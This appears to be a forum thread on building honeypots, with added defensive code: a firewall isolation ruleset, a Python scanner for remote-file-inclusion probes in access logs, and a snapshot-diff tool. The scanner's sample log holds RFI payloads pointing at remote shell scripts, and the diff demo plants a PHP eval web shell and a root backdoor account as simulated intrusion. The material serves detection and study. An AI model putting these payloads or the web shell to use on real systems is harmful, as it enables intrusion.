
Posted

I can't offhand, but I would suggest making sure you do a lot of research on this before doing it. Every extra thing you put on your network increases the attack surface, and if you put on a honeypot and get it wrong, you could end up deliberately putting a huge hole into your network.

Posted

Yeah, I've been waiting to see Hak5 do a segment on this and suggested it like 2 years ago. My main thing would be to use a VM and then either XP pre-SP1, or even an older Apache server that is known to have flaws. You will want to deliberately leave some hole open, but don't make it obvious that it is a honeypot.

One such project, http://www.projecthoneypot.org/about_us.php, offers software you can install to catch spammers. That's just one example of what can be done.

Honeynet offers some papers on things pertaining to honeypots: http://www.honeynet.org/papers

Another article on how to set one up: http://www.oreillynet.com/pub/a/sysadmin/2006/09/28/honeypots.html. I believe it is FreeBSD based, but it could probably be done on Linux, just not with the exact same libraries, for obvious reasons (Unix vs Linux).

Posted

If you did an XP version, what would you use it for? Would you want to try to collect tools from it, monitor and learn techniques, try to back-trace the attackers?

On a recent Exotic Liability podcast they talked about deploying honeypots inside networks to detect attacks and malware trying to escape or probe other systems.

Posted

When deploying a honeypot, you want to ensure that it does not make any direct connection back into your network, or the attacker will use this weakness to exploit your network.

You want to ensure that the attacker stays inside that box, so securing the box will be very important.

There are a few websites that sort of walk you through the whole process of deploying a honeypot. I would also recommend watching their videos; they should give you more ideas.

www.irongeek.com

www.pauldotcom.com
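The isolation advice in the post above (no path from the honeypot back into the network, keep the attacker inside the box), as an added example that is not from the thread or from either site linked: an nftables ruleset for a small Linux gateway that puts the honeypot on its own segment. Everything concrete here is an assumption for the example: eth0 faces the internet, eth1 is the LAN 192.168.1.0/24, eth2 is a dedicated honeypot segment 10.66.0.0/24 with the honeypot at 10.66.0.10, and 192.168.1.50 is the one analyst box allowed to SSH in. How the public side reaches the honeypot (a routed address or upstream DNAT) is out of scope.

```nft
#!/usr/sbin/nft -f
# Added example (not the thread's own config): a "honeywall" that lets the
# internet reach the honeypot, lets the honeypot fetch things slowly from the
# internet, and never lets the honeypot initiate anything toward the LAN.
# Assumed layout: eth0 = internet, eth1 = LAN, eth2 = honeypot-only segment.
define LAN      = 192.168.1.0/24
define HONEYNET = 10.66.0.0/24
define HONEYPOT = 10.66.0.10
define ANALYST  = 192.168.1.50      # assumed analyst workstation

flush ruleset

table inet honeywall {
    chain forward {
        type filter hook forward priority 0; policy drop;

        ct state invalid drop
        ct state established,related accept

        # 1. Nothing the honeypot starts may reach the LAN. Logged so you see
        #    the pivot attempt, which is itself useful intelligence.
        iifname "eth2" ip daddr $LAN log prefix "HONEYPOT->LAN " drop

        # 2. The internet may open new connections to the honeypot: that is the bait.
        iifname "eth0" oifname "eth2" ip daddr $HONEYPOT ct state new accept

        # 3. The honeypot may open outbound connections, but rate-limited and
        #    logged: an attacker can pull down a toolkit, but cannot use the box
        #    to scan or flood third parties at full speed.
        iifname "eth2" oifname "eth0" ip saddr $HONEYPOT ct state new \
            limit rate 15/minute burst 20 packets log prefix "HONEYPOT-OUT " accept
        iifname "eth2" oifname "eth0" ip saddr $HONEYPOT ct state new drop

        # 4. From the LAN, only the analyst box may reach the honeypot, only over SSH.
        #    Replies to that session are covered by the established,related rule.
        iifname "eth1" oifname "eth2" ip saddr $ANALYST ip daddr $HONEYPOT \
            tcp dport 22 ct state new accept
    }

    chain input {
        type filter hook input priority 0; policy drop;

        ct state established,related accept
        iifname "lo" accept

        # The honeypot gets no service from the gateway itself (no SSH, no DNS,
        # nothing to attack on the next hop).
        iifname "eth2" log prefix "HONEYPOT->GW " drop

        # Management of the gateway from the LAN; tighten to $ANALYST in practice.
        iifname "eth1" accept
    }
}
```

Two things the ruleset cannot do for you: it only filters what is routed through the gateway, so the honeypot must really be on its own bridge or VLAN (if it shares a layer-2 segment with the LAN, ARP and direct traffic never cross this box), and the outbound allowance in rule 3 is a deliberate trade-off between realism and liability, so review the HONEYPOT-OUT log lines regularly and shrink the rate if the box starts being used against others.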

Posted (edited)

If you did an XP version, what would you use it for? Would you want to try to collect tools from it, monitor and learn techniques, try to back-trace the attackers?

On a recent Exotic Liability podcast they talked about deploying honeypots inside networks to detect attacks and malware trying to escape or probe other systems.

Purely for learning, in my case: what they did to get in, how they got in, what they changed, installed, etc. I've not actually done this yet, but I want to. I'd like a way to take a snapshot and then compare changes made to the system, like what was done to the registry, back doors, etc. Even gather the programs they installed and where they report to.

My website used to get attacked pretty regularly, but luckily it was never compromised. Not that it couldn't be done, but I've been lucky enough not to be vulnerable to the attacks in question. Most of the people try RFI attacks and then move on when nothing gives up the ghost. I've been able to examine error logs and trace them back up the chain in a lot of cases, all the way to the IRC servers they use for their botnets, but I have no clue how to control the bot or access its commands; I just sit in the channel and watch stuff come across the screen as it reports sites it found, the links, vulns, etc.

I imagine botnet owners probably already do something similar as a means to take over other botnets and then use them for themselves, but that is not my intent. Purely academic and curiosity from my standpoint, but I can see where using this, even as mentioned on Exotic Liability, in the enterprise network to capture what's on your corporate LAN would be useful. We had a few outbreaks where I used to work. The I Love You virus, Melissa, and the Blaster worm were three I recall getting into the network, but only affecting a small portion of desktops and older Windows servers from the lab. It was contained within the first few hours, but it took weeks to comb through everything to make sure it hadn't been able to spread. Something I think a honeypot would have helped with, had they implemented their own on the network to capture attacks on the LAN.

Edited by digip
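The log review digip describes above (spotting RFI probes in the web server logs and following them back to the host the attacker stages from), as an added example that is not code from the thread: a small Python scanner for combined-format access logs. The log lines are constructed for the demo, and the payload patterns (an absolute URL or a PHP stream wrapper passed as a query-string value) are the common RFI shapes, not an exhaustive signature set.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache/nginx combined-format
access logs and collect the staging hosts they point at.
Added example, not code from the thread; SAMPLE_LOG is constructed data."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format:
#   host ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Values an attacker supplies hoping the application will include() them:
# absolute URLs, protocol-relative URLs, and PHP stream wrappers.
RFI_VALUE_RE = re.compile(
    r'^(?:(?:https?|ftps?)://|//[^/]|(?:php|data|expect|zip|phar)://)', re.I
)

# Constructed sample: two probes from one client (the second double-encoded),
# one php://input probe, and two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2009:13:55:36 -0400] "GET /index.php?page=http://203.0.113.99/r57.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Oct/2009:13:55:37 -0400] "GET /index.php?page=http%253A%252F%252F203.0.113.99%252Fc99.txt%253F HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
198.51.100.4 - - [10/Oct/2009:13:56:02 -0400] "GET /gallery/?view=php://input HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2009:13:57:15 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2009:13:58:00 -0400] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()


def _included_host(value):
    """Host named by an RFI payload, or None for stream wrappers like php://."""
    if value.startswith("//"):
        value = "http:" + value
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme.lower() in ("http", "https", "ftp", "ftps"):
        return parts.hostname
    return None


def find_rfi_attempts(lines):
    """One record per query parameter whose value looks like an RFI payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # parse_qsl decodes once; decode again because attackers often
        # double-encode the URL to slip past naive filters.
        for name, once_decoded in parse_qsl(query, keep_blank_values=True):
            value = unquote(once_decoded)
            if RFI_VALUE_RE.match(value):
                hits.append({
                    "client": m.group("host"),
                    "path": path,
                    "param": name,
                    "payload": value,
                    "remote_host": _included_host(value),
                    "status": int(m.group("status")),
                })
    return hits


def staging_hosts(hits):
    """Map each attacking client to the hosts it tried to make the app fetch.
    Those staging hosts are where the trail back toward the botnet starts."""
    out = {}
    for h in hits:
        if h["remote_host"]:
            out.setdefault(h["client"], set()).add(h["remote_host"])
    return out


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(f'{h["client"]} {h["status"]} {h["path"]} [{h["param"]}] {h["payload"]}')
    print(staging_hosts(find_rfi_attempts(SAMPLE_LOG)))
```

The access log only records the request line, so payloads sent in POST bodies, cookies or headers are invisible here; those need the application's own logging or a capture in front of the server. A hit with status 200 is the line worth a closer look, since it means the application happily served the page with the attacker's value in it.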
Posted

Purely for learning, in my case, what they did to get in, how they get in, what they changed, installed, etc. I've not actually done this yet, but I want to. I'd like a way to take a snapshot, and then compare changes made to the system, like what was done to the registry, back doors, etc. Even gather the programs they installed and where they report to.

Same here; I haven't actually deployed one yet, but it would certainly be a very useful tool to deploy, and it would also help us understand the techniques and methods used to break into a system, and from that, learn what they do once they have compromised a system.
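The "take a snapshot, then compare what changed" idea raised by digip two posts up and echoed in the reply above, as an added example that is not code from the thread: a baseline-and-diff of a file tree in Python. The sample tree and the "attacker" changes are constructed in a temporary directory. On a real honeypot, take the baseline from the clean VM image and run the second snapshot against the guest's disk mounted read-only from the host, not from inside the compromised guest, because a rootkit on the guest can hide files from whatever you run there. On Windows, the same comparison over exported registry hives gives the registry view digip mentions.

```python
"""Baseline-and-diff of a file tree: what did they add, remove, change, or
re-permission?  Added example, not code from the thread.  The sample
intrusion is constructed in a temp directory for the demo."""
import hashlib
import os
import shutil
import stat
import tempfile


def _file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Return {relative_path: (digest, mode_bits)} for every file under root.
    Symlinks are recorded by target rather than followed, so a planted link
    into /etc shows up as a change instead of being chased."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                digest = "symlink:" + os.readlink(full)
            elif stat.S_ISREG(st.st_mode):
                digest = _file_digest(full)
            else:
                digest = "special"
            manifest[os.path.relpath(full, root)] = (digest, stat.S_IMODE(st.st_mode))
    return manifest


def diff(baseline, current):
    """Classify every path by what changed between two manifests."""
    result = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            result["added"].append(rel)
        elif rel not in current:
            result["removed"].append(rel)
        else:
            old_digest, old_mode = baseline[rel]
            new_digest, new_mode = current[rel]
            if old_digest != new_digest:
                result["modified"].append(rel)
            if old_mode != new_mode:
                result["mode_changed"].append((rel, oct(old_mode), oct(new_mode)))
    return result


def build_sample_intrusion():
    """Construct a toy tree, baseline it, apply attacker-like changes, and
    return (baseline, after, root).  Constructed data; caller removes root."""
    root = tempfile.mkdtemp(prefix="honeypot-demo-")

    def write(rel, data, mode=0o644):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(data)
        os.chmod(full, mode)

    write("etc/passwd", "root:x:0:0::/root:/bin/sh\n")
    write("bin/sh", "#!/bin/sh\n# stand-in for a shell binary\n", 0o755)
    write("var/www/index.php", "<?php echo 'hello'; ?>\n")
    write("var/log/auth.log", "Accepted password for root\n")
    baseline = snapshot(root)

    # "Attacker" activity: extra uid-0 account, web shell, dropper in a hidden
    # tmp dir, setuid bit on the shell, and the auth log wiped.
    write("etc/passwd", "root:x:0:0::/root:/bin/sh\nsshd2:x:0:0::/tmp:/bin/sh\n")
    write("var/www/index.php", "<?php eval($_GET['c']); ?>\n")
    write("tmp/.ICE-unix/.x/bd", "placeholder for a dropped binary\n", 0o755)
    os.chmod(os.path.join(root, "bin/sh"), 0o4755)
    os.remove(os.path.join(root, "var/log/auth.log"))
    after = snapshot(root)
    return baseline, after, root


if __name__ == "__main__":
    before, after, root = build_sample_intrusion()
    try:
        for kind, items in diff(before, after).items():
            for item in items:
                print(f"{kind:13} {item}")
    finally:
        shutil.rmtree(root)
```

Store the baseline manifest somewhere the honeypot cannot reach (the gateway or the analyst box), and treat the "added" list as the seed for the second half of digip's question: those are the files to pull off the disk image and look at for the hosts they report to.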
